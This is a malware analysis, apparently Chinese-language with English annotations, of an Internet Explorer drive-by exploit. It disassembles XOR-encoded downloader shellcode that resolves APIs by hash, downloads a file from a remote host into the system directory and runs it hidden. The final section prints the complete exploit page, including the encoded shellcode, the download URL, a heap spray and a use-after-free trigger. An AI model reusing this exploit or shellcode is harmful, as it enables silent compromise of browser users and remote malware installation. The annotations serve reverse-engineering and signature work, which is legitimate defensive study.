1、初始化代码 (1. Initialization code)
; Harness prologue: WSAStartup(0x101, &wsadata). The shellcode string in section 7
; begins with four 0x90 bytes followed by "EB 0F" (the jmp at 00401024), so this
; Winsock initialisation is presumably the analyst's test loader rather than part of
; the exploit payload — the bytes between 0040100C and 00401024 are not shown here,
; so treat that as an assumption to confirm.
00401000 > $ 8D85 70FEFFFF lea eax, dword ptr [ebp-190]
00401006 . 50 push eax ; /pWSAData
00401007 . 68 01010000 push 101 ; |RequestedVersion = 101 (1.1.)
0040100C . FF15 18504000 call dword ptr [<&Ws2_32.WSAStartup>] ; \WSAStartup
2、乱乱的代码,因为还没有解密 (2. Garbled code — the body has not been decrypted yet)
; Self-decoding stub: a call/pop fetches the address of the encrypted body (0040103A),
; then 0x180 (384) bytes are XORed in place with the single-byte key 0xEF. The first
; encrypted byte 7F becomes 7F^EF = 90 (nop), which is why section 3 resumes at 0040103B.
; Key and length are constants inside the stub, so "80 33 EF" + "66 B9 80 01" is the
; simplest static signature for this sample.
00401024 . /EB 0F jmp short 00401035 /// jump to the decoder entry (the call below)
00401026 $ |5B pop ebx /// ebx = return address pushed by the call = 0040103A, first encrypted byte
00401027 . |33C9 xor ecx, ecx
00401029 . |66:B9 8001 mov cx, 180 /// 0x180 = 384 bytes to decode in place
0040102D > |8033 EF xor byte ptr [ebx], 0EF /// single-byte XOR key 0xEF
00401030 . |43 inc ebx
00401031 .^|E2 FA loopd short 0040102D /// loop over the whole encrypted region
00401033 . |EB 05 jmp short 0040103A /// done: fall into the freshly decoded code
00401035 > \E8 ECFFFFFF call 00401026 /// the call pushes 0040103A and enters the decoder
; The 0x180-byte body starting at 0040103A as OllyDbg shows it BEFORE the XOR loop
; runs. These mnemonics (out, fucomip, scas, ...) are meaningless — the region is
; opaque data until decoded, and sections 3-6 show the same addresses afterwards.
; The "ascii" line near the end is a mis-rendered byte run, not real text.
0040103A >- 7F 8B jg short 00400FC7
0040103C . 4E dec esi
0040103D . DFEF fucomip st, st(7)
0040103F > EF out dx, eax
00401040 . EF out dx, eax
00401041 . 64:AF scas dword ptr es:[edi]
00401043 . E3 64 jecxz short 004010A9
00401045 . 9F lahf
00401046 . F3: prefix rep:
00401047 . 42 inc edx
00401048 . 64:9F lahf
0040104A . E7 6E out 6E, eax
0040104C . 03EF add ebp, edi
0040104E .^ EB EF jmp short 0040103F
00401050 EF db EF
00401051 64 db 64 ; CHAR 'd'
00401052 03 db 03
00401053 . B9 8761A1E1 mov ecx, E1A16187
00401058 . 0307 add eax, dword ptr [edi]
0040105A . 11EF adc edi, ebp
0040105C . EF out dx, eax
0040105D . EF out dx, eax
0040105E . 66:AA stos byte ptr es:[edi]
00401060 .^ EB B9 jmp short 0040101B
00401062 87 db 87
00401063 77 db 77 ; CHAR 'w'
00401064 11 db 11
00401065 65 db 65 ; CHAR 'e'
00401066 E1 db E1
00401067 07 db 07
00401068 1F db 1F
00401069 EF db EF
0040106A EF db EF
0040106B EF db EF
0040106C 66 db 66 ; CHAR 'f'
0040106D AA db AA
0040106E E7 db E7
0040106F B9 db B9
00401070 87 db 87
00401071 CA db CA
00401072 5F db 5F ; CHAR '_'
…………………………
00401183 1D db 1D
00401184 9B db 9B
00401185 E7 db E7
00401186 2E db 2E ; CHAR '.'
00401187 21 db 21 ; CHAR '!'
00401188 E2 db E2
00401189 EC db EC
0040118A 1D db 1D
0040118B AF db AF
0040118C 04 db 04
0040118D 1E db 1E
0040118E D4 db D4
0040118F 11 db 11
00401190 B1 db B1
00401191 9A db 9A
00401192 0A db 0A
00401193 B5 db B5
00401194 64 db 64 ; CHAR 'd'
00401195 . 04 db 04
00401196 . 64 B5 CB EC ascii "d邓?
0040119A 32 db 32 ; CHAR '2'
3、通过PEB获取kernel32.dll地址 (3. Finding the kernel32.dll base address through the PEB)
; Locate kernel32.dll without any imports by walking PEB -> Ldr -> InInitializationOrderModuleList.
0040103B 64:A1 30000000 mov eax, dword ptr fs:[30] // fs:[0x30] in the TEB holds the pointer to the PEB
00401041 8B40 0C mov eax, dword ptr [eax+C] // PEB+0x0C: pointer to PEB_LDR_DATA, which holds the lists of modules loaded into the process
00401044 8B70 1C mov esi, dword ptr [eax+1C] // PEB_LDR_DATA+0x1C: head (Flink) of InInitializationOrderModuleList
00401047 AD lods dword ptr [esi] // eax = first entry's Flink = second entry. First entry is ntdll.dll; the stub assumes the second is kernel32.dll. NOTE(review): that held on the analyst's target (kernel32 at 7C800000) but newer Windows versions commonly put kernelbase.dll in that slot, so the hash lookup in section 4 would then search the wrong export table — verify on the intended target.
00401048 8B70 08 mov esi, dword ptr [eax+8] // +8 from the InInitializationOrder links = LDR_DATA_TABLE_ENTRY.DllBase, i.e. kernel32's load address
0040104B 81EC 00040000 sub esp, 400 // reserve a 0x400-byte scratch area on the stack ...
00401051 8BEC mov ebp, esp // ... addressed through ebp: [ebp+4..+24] cache resolved API pointers, ebp+0x50 is the path buffer (see sections 5 and 6)
00401053 56 push esi /// esi=7C800000 (kernel32.7C800000) — module base argument for the resolver
00401054 68 8E4E0EEC push EC0E4E8E /// hash of "LoadLibraryA" (ror-13 hash computed by the routine in section 4); the call itself is shown in section 5
4、通过计算寻址 (4. Resolving API addresses by export-name hash)
; sub_0040115C(hash, module_base) -> function address.
; Walks the module's export directory and compares a rolling hash of every
; exported name (esi = ror(esi, 13) + next byte) with the requested hash.
; Calling convention: push base; push hash; call 0040115C — the two dword
; arguments are cleaned by retn 8. Preserves esi/ebp; clobbers eax, ecx, edx,
; ebx and edi (neither ebx nor edi is saved).
0040115C 55 push ebp
0040115D 8BEC mov ebp, esp
0040115F 8B7D 08 mov edi, dword ptr [ebp+8] ; EC0E4E8E — edi = requested hash
00401162 8B5D 0C mov ebx, dword ptr [ebp+C] ; [0012FBC0]=7C800000 (kernel32.7C800000) — ebx = module base
00401165 56 push esi
00401166 8B73 3C mov esi, dword ptr [ebx+3C] ; [7C80003C]=000000E8 — e_lfanew, RVA of the PE header
00401169 8B741E 78 mov esi, dword ptr [esi+ebx+78] ; [7C800160]=0000262C — DataDirectory[0].VirtualAddress = export directory RVA
0040116D 03F3 add esi, ebx ; 7C800000+262C
0040116F 56 push esi ; esi=7C80262C (kernel32.7C80262C) — save the IMAGE_EXPORT_DIRECTORY pointer (popped into edx at 00401193)
00401170 8B76 20 mov esi, dword ptr [esi+20] ; esi=00003528 — AddressOfNames RVA
00401173 03F3 add esi, ebx ; 7C800000+3528
00401175 33C9 xor ecx, ecx
00401177 49 dec ecx ; ecx = -1 so the inc below yields name index 0
00401178 41 inc ecx ; outer loop: next name index
00401179 AD lods dword ptr [esi] ; [esi]=[7C803528]=00004B73 — RVA of this exported name
0040117A 03C3 add eax, ebx ; 7C800000+4B73 — eax -> name string
0040117C 56 push esi ; keep the AddressOfNames cursor across the inner loop
0040117D 33F6 xor esi, esi ; esi = running hash
0040117F 0FBE10 movsx edx, byte ptr [eax] ; next character, sign-extended
00401182 3AF2 cmp dh, dl ; dh is 0 for ASCII bytes, so equality means dl == 0: end of name (a 0xFF byte would also terminate)
00401184 74 08 je short 0040118E
00401186 C1CE 0D ror esi, 0D ; hash = ror(hash, 13) + c
00401189 03F2 add esi, edx
0040118B 40 inc eax
0040118C ^ EB F1 jmp short 0040117F
0040118E 3BFE cmp edi, esi ; does this name's hash match the requested one?
00401190 5E pop esi
00401191 ^ 75 E5 jnz short 00401178 ; no: next name. There is no bound against NumberOfNames, so an unknown hash keeps walking past the end of the table rather than failing cleanly.
00401193 5A pop edx ; edx = export directory
00401194 8BEB mov ebp, ebx ; ebp reused as module base (the frame pointer is restored by the pop below)
00401196 8B5A 24 mov ebx, dword ptr [edx+24] ; AddressOfNameOrdinals RVA
00401199 03DD add ebx, ebp
0040119B 66:8B0C4B mov cx, word ptr [ebx+ecx*2] ; cx = ordinal of the matched name
0040119F 8B5A 1C mov ebx, dword ptr [edx+1C] ; AddressOfFunctions RVA
004011A2 03DD add ebx, ebp
004011A4 8B048B mov eax, dword ptr [ebx+ecx*4] ; function RVA by ordinal (forwarded exports are not handled)
004011A7 03C5 add eax, ebp ; return value = absolute address
004011A9 5E pop esi
004011AA 5D pop ebp
004011AB C2 0800 retn 8 ; callee cleans the two dword arguments
5、通过同一个call,压入不同的初始参数,计算出需要调用的API地址 (5. The same resolver call, given a different hash each time, yields the address of each API to be called)
; Resolve the kernel32 APIs the payload needs, each through the resolver at
; 0040115C (push base, push hash). Results are cached in the scratch frame:
; [ebp+4] LoadLibraryA, [ebp+8] WinExec, [ebp+C] DeleteFileA, [ebp+10] ExitThread,
; [ebp+14] GetSystemDirectoryA. The five hash constants below are fixed in the
; shellcode and can be matched statically.
00401053 56 push esi ; esi=7C800000 (kernel32.7C800000)
00401054 68 8E4E0EEC push EC0E4E8E ; hash("LoadLibraryA")
00401059 E8 FE000000 call 0040115C
0040105E 8945 04 mov dword ptr [ebp+4], eax ; eax=7C801D77 (kernel32.LoadLibraryA)
00401061 56 push esi
00401062 68 98FE8A0E push 0E8AFE98 ; hash("WinExec")
00401067 E8 F0000000 call 0040115C
0040106C 8945 08 mov dword ptr [ebp+8], eax ; eax=7C86114D (kernel32.WinExec)
0040106F 56 push esi
00401070 68 25B0FFC2 push C2FFB025 ; hash("DeleteFileA")
00401075 E8 E2000000 call 0040115C
0040107A 8945 0C mov dword ptr [ebp+C], eax ; eax=7C81E85C (kernel32.DeleteFileA)
0040107D 56 push esi
0040107E 68 EFCEE060 push 60E0CEEF ; hash("ExitThread")
00401083 E8 D4000000 call 0040115C
00401088 8945 10 mov dword ptr [ebp+10], eax ; eax=7C80CCA9 (kernel32.ExitThread)
0040108B 56 push esi
0040108C 68 C179E5B8 push B8E579C1 ; hash("GetSystemDirectoryA")
00401091 E8 C6000000 call 0040115C
00401096 8945 14 mov dword ptr [ebp+14], eax ; eax=7C814C63 (kernel32.GetSystemDirectoryA)
00401099 40 inc eax ; starting just past the GetSystemDirectoryA entry point ...
0040109A 8038 C3 cmp byte ptr [eax], 0C3 ; ... scan forward for the first 0xC3 (ret) byte inside kernel32
0040109D ^ 75 FA jnz short 00401099 ; the lines between here and 004010A8 are not shown; presumably this ret address ends up in [ebp+18], which every later call passes in edx to the helper at 00401145 — TODO confirm
6、加载dll,如果原来下载过则先删除再下载,通过计算获得URLMON.URLDownloadToFileA地址执行下载指定文件到系统目录,执行后退出线程 (6. Load urlmon.dll, delete any earlier copy of the drop file, resolve URLMON.URLDownloadToFileA by hash, download the remote file into the system directory, run it, then exit the thread)
; Payload: LoadLibraryA(esi) -> resolve URLDownloadToFileA -> build "<system dir>\~.exe"
; -> DeleteFileA(path) -> URLDownloadToFileA(url, path) -> WinExec(path, SW_HIDE) -> ExitThread(-1).
; Every API is invoked through the helper at 00401145 (not in this listing) with
; eax = function pointer, ecx = argument count and edx = [ebp+18]; its exact
; mechanics are not visible here. NOTE(review): the drop location is the system
; directory, so the stub presumably relies on the browser running with rights to
; write there; with a restricted user neither DeleteFileA nor the download would
; succeed, and nothing below checks their return values.
004010A8 8975 24 mov dword ptr [ebp+24], esi ; esi -> a string block in the decoded body. [ebp+24]+7 is the URL below, so the first 7 bytes are presumably "urlmon\0", the argument of the LoadLibraryA call right after — TODO confirm against the decoded bytes
004010AB 8B45 04 mov eax, dword ptr [ebp+4] ; kernel32.LoadLibraryA
004010AE 6A 01 push 1
004010B0 59 pop ecx ; ecx = 1 argument
004010B1 8B55 18 mov edx, dword ptr [ebp+18]
004010B4 56 push esi ; lpLibFileName
004010B5 E8 8B000000 call 00401145 ; LoadLibraryA(esi)
004010BA 50 push eax ; eax=75C60000 (URLMON.75C60000) — module base for the resolver
004010BB 68 361A2F70 push 702F1A36 ; hash("URLDownloadToFileA")
004010C0 E8 97000000 call 0040115C
004010C5 8945 1C mov dword ptr [ebp+1C], eax ; URLMON.URLDownloadToFileA
004010C8 8BC5 mov eax, ebp
004010CA 83C0 50 add eax, 50 ; path buffer = scratch frame + 0x50
004010CD 8945 20 mov dword ptr [ebp+20], eax
004010D0 68 FF000000 push 0FF ; uSize = 0xFF
004010D5 50 push eax ; lpBuffer
004010D6 8B45 14 mov eax, dword ptr [ebp+14] ; kernel32.GetSystemDirectoryA
004010D9 6A 02 push 2
004010DB 59 pop ecx ; 2 arguments
004010DC 8B55 18 mov edx, dword ptr [ebp+18]
004010DF E8 61000000 call 00401145 ; GetSystemDirectoryA -> C:\WINDOWS\system32, eax = number of characters written
004010E4 0345 20 add eax, dword ptr [ebp+20] ; eax -> terminating NUL of the directory string
004010E7 C700 5C7E2E65 mov dword ptr [eax], 652E7E5C /// append bytes 5C 7E 2E 65 = "\~.e"
004010ED C740 04 7865000>mov dword ptr [eax+4], 6578 /// append bytes 78 65 00 00 = "xe" + NUL
004010F4 FF75 20 push dword ptr [ebp+20] /// lpFileName = C:\WINDOWS\system32\~.exe
004010F7 8B45 0C mov eax, dword ptr [ebp+C] ; kernel32.DeleteFileA
004010FA 6A 01 push 1
004010FC 59 pop ecx
004010FD 8B55 18 mov edx, dword ptr [ebp+18]
00401100 E8 40000000 call 00401145 /// DeleteFileA: remove any earlier copy of C:\WINDOWS\system32\~.exe; the result is ignored
00401105 6A 07 push 7
00401107 58 pop eax
00401108 0345 24 add eax, dword ptr [ebp+24] ; eax = [ebp+24] + 7 -> the URL string
0040110B 33DB xor ebx, ebx
0040110D 53 push ebx ; lpfnCB = NULL
0040110E 53 push ebx ; dwReserved = 0
0040110F FF75 20 push dword ptr [ebp+20] ; szFileName = C:\WINDOWS\system32\~.exe
00401112 50 push eax /// szURL = hxxp://w.qqnetcn.cn/dd.exe (the JoewmLoad string appended to the shellcode in section 7)
00401113 53 push ebx ; pCaller = NULL
00401114 8B45 1C mov eax, dword ptr [ebp+1C] /// URLMON.URLDownloadToFileA
00401117 6A 05 push 5
00401119 59 pop ecx ; 5 arguments
0040111A 8B55 18 mov edx, dword ptr [ebp+18]
0040111D E8 23000000 call 00401145 /// download to ~.exe; the HRESULT is not checked, so WinExec below runs even if the download failed
00401122 6A 00 push 0 ; uCmdShow = 0 (SW_HIDE)
00401124 FF75 20 push dword ptr [ebp+20] ; lpCmdLine = the dropped path
00401127 8B45 08 mov eax, dword ptr [ebp+8] ; kernel32.WinExec
0040112A 6A 02 push 2
0040112C 59 pop ecx
0040112D 8B55 18 mov edx, dword ptr [ebp+18]
00401130 E8 10000000 call 00401145 /// run the downloaded file C:\WINDOWS\system32\~.exe with a hidden window
00401135 6A FF push -1 ; dwExitCode = -1
00401137 8B45 10 mov eax, dword ptr [ebp+10] ; kernel32.ExitThread
0040113A 6A 01 push 1
0040113C 59 pop ecx
0040113D 8B55 18 mov edx, dword ptr [ebp+18]
00401140 E8 00000000 call 00401145 /// ExitThread: end the hijacked thread instead of returning into the corrupted caller
7、源代码 (7. Source of the exploit page)
<SCRIPT language="javascript">
// Exploit page for Internet Explorer (CollectGarbage and clearAttributes are
// JScript/MSHTML-only). Three stages: assemble the shellcode, heap-spray it,
// trigger the browser defect.
//
// Stage 1: the downloader shellcode of sections 2-6 followed by its URL.
// JoewmLoad decodes to "http://w.qqnetcn.cn/dd.exe" plus a NUL terminator; the
// shellcode reads it at [ebp+24]+7 (section 6).
JoewmLoad = unescape("%u7468%u7074%u2F3A%u772F%u712E%u6E71%u7465%u6E63%u632E%u2F6E%u6464%u652E%u6578%u0000");
// nod32 decodes to 90 90 90 90 EB 0F 5B 33 C9 66 B9 80 01 80 33 EF 43 E2 FA EB 05 E8 ...,
// i.e. four NOPs and the XOR-0xEF decoder stub of section 2. The string is built
// from many small fragments, which defeats naive signature matching on the page
// source; the "nod32".."nod36" names carry no meaning beyond that.
var nod32="%"+"u"+"9"+"0"+"9"+"0%"+"u9"+"0"+"90%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805";
var nod33="%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d";
var nod34="%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf";
var nod35="%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba";
var nod36="%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4";
// The remaining fragments are the still-encrypted body (compare the byte dump
// in section 2: "%u8b7f" = 7F 8B at 0040103A, etc.).
var shellcode = unescape(nod32+"%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb"+nod33+"%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615"+"%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa"+nod34+"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3"+nod35+"%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+nod36+"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1");
// The URL is placed directly after the code so the shellcode can find it at a
// fixed offset from its own body.
shellcode=shellcode+JoewmLoad;
// Stage 2: heap spray. 0xD0 (208) array entries each hold roughly 1 MB of
// 0x0D0D filler ending in the shellcode, so that a corrupted pointer landing
// anywhere in the filler slides forward into the decoder stub. The filler is
// built by doubling a seed string (b+=b) and trimming to half of ls characters.
var array = new Array();
var ls = 1044099;
var Joewm="%"+"u"+"0"+"D"+"0"+"D"+"%"+"u"+"0"+"D"+"D"+"D".replace("DD","0D");
var b = unescape(Joewm); while(b.length<ls) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xD0; i++) {
array[i] = lh + shellcode;
}
CollectGarbage();
// Stage 3: trigger. 500 <img> elements are created; a <tbody> is cloned, has its
// attributes cleared and is released; then every <img> src is set to a string
// beginning with the bytes 0b 0b 0b 0b, and the clone is used again. Inferred
// from the shape only (this page does not identify the MSHTML defect): the
// freed object's memory is meant to be reclaimed by the img src data so that the
// final o2.click dereferences attacker-chosen pointer values.
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>